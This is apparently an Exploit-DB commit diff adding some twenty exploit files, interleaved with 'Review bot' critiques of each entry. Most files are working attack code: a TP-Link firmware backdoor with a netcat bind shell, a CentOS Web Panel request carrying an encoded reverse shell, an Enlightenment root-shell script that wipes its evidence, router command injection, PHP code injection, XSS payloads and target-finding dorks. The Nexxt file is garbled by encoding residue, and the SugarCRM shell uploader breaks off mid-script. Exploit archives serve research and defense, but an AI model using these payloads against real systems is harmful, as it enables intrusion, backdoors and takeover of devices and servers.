DB: 2023-04-02

23 changes to exploits/shellcodes/ghdb

ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)

Hughes Satellite Router HX200 v8.3.1.14 -  Remote File Inclusion

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)

TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)

GeoVision Camera GV-ADR2701 - Authentication Bypass

AD Manager Plus 7122 - Remote Code Execution (RCE)

Enlightenment v0.25.3 - Privilege escalation

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

Apache 2.4.x - Buffer Overflow

perfSONAR v4.4.5 - Partial Blind CSRF

SugarCRM 12.2.0 - Remote Code Execution (RCE)

XCMS v1.83 - Remote Command Execution (RCE)

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit

Splashtop 8.71.12001.0 - Unquoted Service Path

Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

FlipRotation v1.0 decoder - Shellcode (146 bytes)

Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)

macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
This commit is contained in:
Exploit-DB 2023-04-02 00:16:21 +00:00
parent 9b56e8731e
commit 3de26153c8
23 changed files with 2847 additions and 0 deletions


@ -0,0 +1,19 @@
# Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)
# Date: 12/09/2022
# Exploit Author: Rob, CTRL Group
# Vendor Homepage: marigroup.com
# Version: V3.3.3 and under
# Tested on: Windows IIS all versions
# CVE : CVE-2022-35543
“Stored Cross-Site Scripting” Vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication however, once the payload is stored, any user visiting the portal will trigger the alert.
Login to the appplication
Browse to "Settings" tab and tehn " Wards". Create a new word with the following payload at the ward name:
<script>alert(document.cookie)</script>
Any user browsing the application will trigger the payload.
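Review bot: the reproduction steps carry typos that obscure the instruction: "appplication" for "application", "tehn" for "then", and "Create a new word" should read "ward", since the payload goes into the ward name field. The entry also records no remediation; add the fix (HTML-encoding the stored ward name wherever it is rendered, plus a fixed version if the vendor has released one) so readers can assess exposure rather than only reproduce the alert.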


@ -0,0 +1,71 @@
Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion
Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37
Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high- performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.
Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.
Tested on: WindWeb/1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php
23.12.2022
--
snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//
//URL http://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()
console.log("Loading Broadband Satellite Browsing Test");
//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");
console.log("Calling StartTest()");
StartTest()
//console.log("Calling DoTest()");
//DoTest()
//Unload weapon
//document.getElementById("URLList").remove();
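Review bot: the PoC calls `AddURLtoList()` and `StartTest()` without saying where they come from; from the `//URL http://TARGET/fs/dynaform/speedtest.html` comment they appear to be functions of the router's own speed-test page, so a comment stating that the snippet is meant to be run in the browser console on that page would make the reproduction self-explanatory. The advisory lists affected firmware for five models (HX200, HX90, HX50L, HN9460, HN7000S) but gives no vendor fix, workaround or response; note the vendor status if one exists.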

199
exploits/hardware/remote/51192.py Executable file

@ -0,0 +1,199 @@
# !/usr/bin/python3
# Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Tobias Müller
# Date: 2022-12-01
# Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329
# Vendor Homepage: https://www.tp-link.com/
# Tested On: TP-Link TL-WR902AC
# Vulnerability Description: Remote Code Execution via importing malicious firmware file
# CVE: CVE-2022-48194
# Technical Details: https://github.com/otsmr/internet-of-vulnerable-things
TARGET_HOST = "192.168.0.1"
ADMIN_PASSWORD = "admin"
TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip"
import requests
import os
import glob
import subprocess
import base64, os, hashlib
from Crypto.Cipher import AES, PKCS1_v1_5 # pip install pycryptodome
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad
for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]:
if "not found" in subprocess.check_output(["which", program]).decode():
print(f"[!] need {program} to run")
exit(1)
class WebClient(object):
def __init__(self, host, password):
self.host = "http://" + host
self.password = password
self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest()
self.aes_key = "7765636728821987"
self.aes_iv = "8775677306058909"
self.session = requests.Session()
crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text
self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16)
self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16)
self.seq = int(crypto_data.split("\n")[3].split('"')[1])
self.jsessionid = self.get_jsessionid()
def get_jsessionid(self):
post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n"
self.get_encrypted_request_data(post_data, True)
return self.session.cookies["JSESSIONID"]
def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8'))
plaintext_padded = pad(plaintext, aes_block_size)
return cipher.encrypt(plaintext_padded)
def rsa_encrypt(self, n, e, plaintext):
public_key = RSA.construct((n, e)).publickey()
encryptor = PKCS1_v1_5.new(public_key)
block_size = int(public_key.n.bit_length() / 8) - 11
encrypted_text = ''
for i in range(0, len(plaintext), block_size):
encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex()
return encrypted_text
def get_encrypted_request_data(self, post_data, is_login: bool):
encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8'))
encrypted_data = base64.b64encode(encrypted_data).decode()
self.seq += len(encrypted_data)
signature = f"h={self.password_hash}&s={self.seq}"
if is_login:
signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature
encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8'))
body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n"
return self.cgi_basic("_gdpr", body)
def cgi_basic(self, url: str, body: str):
res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={
"Referer": "http://192.168.0.1/"
})
if res.status_code != 200:
print(res.text)
raise ValueError("router not reachable")
return res
def cmd(command):
print("[*] running " + command)
os.system(command)
def build_backdoor():
if os.path.isdir("./tp_tmp"):
cmd("rm -r -f ./tp_tmp")
os.mkdir("./tp_tmp")
os.chdir('./tp_tmp')
print("[*] downloading firmware")
res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD)
with open("firmware.zip", "wb") as f:
f.write(res.content)
print("[*] downloading netcat")
#res = requests.get(NETCAT_PRECOMPILED_FILE)
#with open("netcat", "wb") as f:
# f.write(res.content)
if os.path.isfile("netcat"):
print("[!] netcat not found")
exit()
cmd('unzip firmware.zip')
filename = glob.glob("TL-*.bin")[0]
cmd(f"mv '(unknown)' firmware.bin")
cmd('binwalk --dd=".*" firmware.bin')
cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200')
with open("./squashfs-root/etc/init.d/back", "w") as f:
f.write("""
#!/bin/sh
while true;
do
netcat -l -p 3030 -e /bin/sh
sleep 5
done
""")
cmd("chmod +x ./squashfs-root/etc/init.d/back")
with open("./squashfs-root/etc/init.d/rcS", "r+") as f:
content = f.read()
content = content.replace("cos &", "/etc/init.d/back &\ncos &")
f.write(content)
cmd("cp netcat ./squashfs-root/usr/bin/")
cmd("chmod +x ./squashfs-root/usr/bin/netcat")
cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144")
size = subprocess.check_output(["file", "backdoor.squashfs"]).decode()
offset = int(size.split(" ")[9]) + 1442304
cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304")
cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304")
cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}")
os.chdir('../')
cmd(f"mv ./tp_tmp/backdoor.bin .")
cmd("rm -r -f ./tp_tmp")
def upload_backdoor():
wc = WebClient(TARGET_HOST, ADMIN_PASSWORD)
print("[*] uploading backdoor")
files = {
'filename': open('backdoor.bin','rb')
}
re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={
"JSESSIONID": wc.jsessionid
}, headers={
"Referer": "http://192.168.0.1/mainFrame.htm"
}, files=files)
if re_upload.status_code != 200 or "OK" not in re_upload.text:
print("[!] error")
exit(1)
print("[*] success!")
print("\nWait for router restart, then run:")
print("nc 192.168.0.1 3030")
build_backdoor()
upload_backdoor()
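Review bot: the first line is `# !/usr/bin/python3` with a space after `#`, which is not a shebang the kernel will honour; drop the space. `os` is imported twice (`import os` and `import base64, os, hashlib`), and `requests` is imported before the `TARGET_HOST`/`ADMIN_PASSWORD` constants while the rest of the imports come after them, so the module header should be reordered. The header also gives no fixed firmware version or vendor response for CVE-2022-48194; readers checking exposure need to know whether the build after `220329` rejects modified images.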


@ -0,0 +1,42 @@
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=
n (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149
import requests
import base64
router_host =3D "http://192.168.1.1"
username =3D "admin"
password =3D "admin"
def main():
send_payload("&telnetd")
print("connect to router using: `telnet "+router_host.split("//")[1]+ "=
` using known credentials")
pass
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def get_cookie(header):
url =3D router_host+"/login"
params =3D {"arg":header, "_n":1}
resp=3Drequests.get(url, params=3Dparams)
=20
def send_payload(payload):
url =3D router_host+"/goform/sysTools"
headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa=
ssword))}
params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK=
"}
requests.post(url, headers=3Dheaders, data=3Dparams)
if __name__ =3D=3D '__main__':
main()
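Review bot: the file as committed contains quoted-printable residue: `=3D` where `=` belongs (for example `router_host =3D "http://192.168.1.1"` and `if __name__ =3D=3D '__main__':`) and soft line breaks that split `Remote Code Executio=` / `n (RCE)` and `pa=` / `ssword`, so it is not valid Python source; the decoded file should be committed. Separately, `get_cookie()` is defined but never called and returns nothing, and no fixed firmware version is recorded for CVE-2022-44149.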


@ -0,0 +1,72 @@
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10
# Exploitation
1. Capture The Login Request with burp, Do intercept request to response
Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1
{"UserName":"admin","Password":"0X]&0D]]05"}
```
2. The following is the normal response when you login to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```
By editing the response to the following, you can successfully log in to
the web application.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```
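Review bot: the write-up shows the login response being edited from `"StatusCode": 460` / `"PasswdError"` to `"StatusCode": 0` / `"Succeed"`, but it never states whether later requests to the camera are accepted afterwards, which is what distinguishes a server-side authentication bypass from a client-side UI change; the entry should document that. The captured request also carries `Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==`, i.e. `undefined:undefined`, which suggests no valid credential was ever sent and is worth stating explicitly. No fixed firmware version or mitigation is listed.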


@ -0,0 +1,54 @@
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)
# Exploit Author: Chan Nyein Wai & Thura Moe Myint
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/
# Software Link: https://www.manageengine.com/products/ad-manager/download.html
# Version: Ad Manager Plus Before 7122
# Tested on: Windows
# CVE : CVE-2021-44228
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md
### Description
In the summer of 2022, I have been doing security engagement on Synack
Red Team in the collaboration with my good friend (Thura Moe Myint).
At that time, Log4j was already widespread on the internet. Manage
Engine had already patched the Ad Manager Plus to prevent it from
being affected by the Log4j vulnerability. They had mentioned that
Log4j was not affected by Ad Manager Plus. However, we determined that
the Ad Manager Plus was running on our target and managed to exploit
the Log4j vulnerability.
### Exploitation
First, Lets make a login request using proxy.
Inject the following payload in the ```methodToCall``` parameter in
the ```ADSearch.cc``` request.
Then you will get the dns callback with username in your burp collabrator.
### Notes
When we initially reported this vulnerability to Synack, we only
managed to get a DNS callback and our report was marked as LDAP
injection. However, we attempted to gain full RCE on the host but were
not successful. Later, we discovered that Ad Manager Plus was running
on another target, so we tried to get full RCE on that target. We
realized that there was a firewall and an anti-virus running on the
machine, so most of our payloads wouldn't work. After spending a
considerable amount of time , we eventually managed to bypass the
firewall and anti-virus, and achieve full RCE.
### Conclusion
We had already informed Zoho about the log4j vulnerability, and even
after it was fixed, they decided to reward us with a bonus bounty for
our report.
### Mitigation
Updating to a version of Ad Manager Plus higher than 7122 should
resolve the issue.
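Review bot: the Exploitation section says "Inject the following payload in the methodToCall parameter", but no payload follows, so the reproduction steps are incomplete as committed. The version information is also inconsistent: the header says "Ad Manager Plus Before 7122" while Mitigation says a version "higher than 7122" is needed, which leaves build 7122 itself ambiguous. Finally, "Log4j was not affected by Ad Manager Plus" reads backwards; the vendor statement being contradicted is that AD Manager Plus was not affected by Log4j.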


@ -0,0 +1,100 @@
## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## CVE ID: CVE-2022-37706
## Description:
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
Enlightenment_sys in Enlightenment before 0.25.3 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring
If the attacker has access locally to some machine on which the
machine is installed Enlightenment
he can use this vulnerability to do very dangerous stuff.
## STATUS: CRITICAL Vulnerability
## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
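Review bot: the Description says "Enlightenment_sys in Enlightenment before 0.25.3" is affected while the title names v0.25.3 itself as vulnerable; state the exact affected and fixed versions so the CVE-2022-37706 entry can be matched against installed packages. The file also ends with an e-mail signature block (job titles, URLs and a base64-looking line) that is not part of the exploit and should be dropped from the committed file, and the "Tested on" block is an `/etc/os-release` dump rather than the Enlightenment package version actually tested.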


@ -0,0 +1,39 @@
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current version
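Review bot: "Bash commands can be run because double quotes are used to log incorrect entries to the system" does not explain the defect; from the PoC, the `login` query parameter of `/login/index.php` ends up inside a double-quoted shell string used to log failed logins, so command substitution in it is expanded, and the Description should say that plainly. The Solution line "Upgrade to CWP7 current version" should name the fixed version; the changelog anchor given in the Vendor line is presumably the release that contains the fix.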


@ -0,0 +1,23 @@
Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.5
Vulnerability Type: Partial Blind CSRF
Discovered by: Ryan Moore
CVE: CVE-2022-41413
Summary
A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR.
This vulnerability was patched in perfSONAR v4.4.6.
Proof of Concept
Examples
Here are two examples of this vulnerability. For further details, review the Technical Overview section below.
Example 1:
Client browser connects to www.google.com in the background.
http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com
Example 2:
Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint.
http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api
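Review bot: "For further details, review the Technical Overview section below" refers to a section that is not present in the file, so the mechanism by which the `url=` parameter bypasses the built-in whitelisting is never explained; either include that section or drop the reference. The Summary also says the page forces "the client to connect unknowingly in the background", i.e. the browser of whoever opens the link issues the request, so the impact falls on the visiting user and on hosts reachable from that user's network rather than on the perfSONAR host itself; stating that explicitly would help readers prioritise the upgrade to v4.4.6.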


@ -0,0 +1,34 @@
# Exploit Title: Apache 2.4.x - Buffer Overflow
# Date: Jan 2 2023
# Exploit Author: Sunil Iyengar
# Vendor Homepage: https://httpd.apache.org/
# Software Link: https://archive.apache.org/dist/httpd/
# Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
# Tested on: (Server) Kali, (Client) MacOS Monterey
# CVE : CVE-2021-44790
import requests
#Example "http(s)://<hostname>/process.lua"
url = "http(s)://<hostname>/<luafile>"
payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
headers = {
'Content-Type': 'multipart/form-data; boundary=4'
}
#Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1.
# But this has to match with the values in Payload.
#Note2: The form data as shown above returns the response as "memory allocation error: block too big".
# But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows
# 3 more bytes during memset
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
#Response returned is
#<h3>Error!</h3>
#<pre>memory allocation error: block too big</pre>
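Review bot: the Version line is self-contradictory: "Any version less than 2.4.51" followed by "Tested on 2.4.50 and 2.4.51" leaves unclear whether 2.4.51 was found vulnerable; record the result per tested version and cite the Apache advisory for CVE-2021-44790 as the authoritative range. The `url` placeholder also needs a note that the target must be a Lua handler served through mod_lua that parses the multipart body, since the comment itself says it is "the lua module" that overflows, not core httpd; without that a reader may test an ordinary URL and conclude the server is not affected.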


@ -0,0 +1,103 @@
Exploit Title: XCMS v1.83 - Remote Command Execution (RCE)
Author: Onurcan
Email: onurcanalcan@gmail.com
Site: ihteam.net
Script Download : http://www.xcms.it
Date: 26/12/2022
The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.
Taking "home.php" for example:
<?php
//home.php
[...]
include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"
?>
So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.
So let's take a look to the bugged code.
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So with a simple html form we can change the footer.
Ex:
<form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
<input type="hidden" name="salva" value="OK" />
<textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
<input type="submit" value="Modifica" />
</form>
<script>document.editor.submit()</script>
Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.
Trick: We can change the admin panel password by inserting this code in the footer:
<?php
$pwd = "owned"; // <- Place here your new password.
$pwd2 = md5($pwd);
unlink("dati/generali/pass.php");
$f = fopen("dati/generali/pass.php",w);
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
fclose($f);
?>
This code delete the old password file and then create a new one with your new password.
Fix:
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So this is a simple exploit:
<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
echo"
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork : inurl:\"mod=notizie\"
by Onurcan
Visit ihteam.net
</pre>
<form method=POST action=".$_POST['PHP_SELF'].">
<pre>
Site :
<input type=text name=site />
Code :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>
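Review bot: the title says XCMS v1.83 while the exploit banner says "XCMS <= v1.82"; align the affected version. The proposed Fix only adds `exit()` after the `header("location:index.php")` redirect, which closes the unauthenticated path but leaves `Scrivi(CGEN."footer".DTB, stripslashes($_POST['testo_0']))` writing unvalidated POST data into a file that `home.php` later `include()`s as PHP, so any admin session (or a stolen one) still yields code execution; a complete fix stores the footer as data and escapes it on output instead of including it. The `// <- save the changements without any kind of control` comment is repeated verbatim in the Fix block even though the fix does not address it, which makes the fix look more complete than it is.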

47
exploits/php/webapps/51187.py Executable file

@ -0,0 +1,47 @@
#!/usr/bin/env python
# Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE)
# Exploit Author: sw33t.0day
# Vendor Homepage: https://www.sugarcrm.com
# Version: all commercial versions up to 12.2.0
# Dorks:
# https://www.google.com/search?q=site:sugarondemand.com&filter=0
# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php
# https://www.shodan.io/search?query=http.title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"
import base64, re, requests, sys, uuid
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 2:
sys.exit("Usage: %s [URL]" % sys.argv[0])
print "[+] Sending authentication request"
url = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}
requests.post(url, cookies=session, data=params, verify=False)
print "[+] Uploading PHP shell\n"
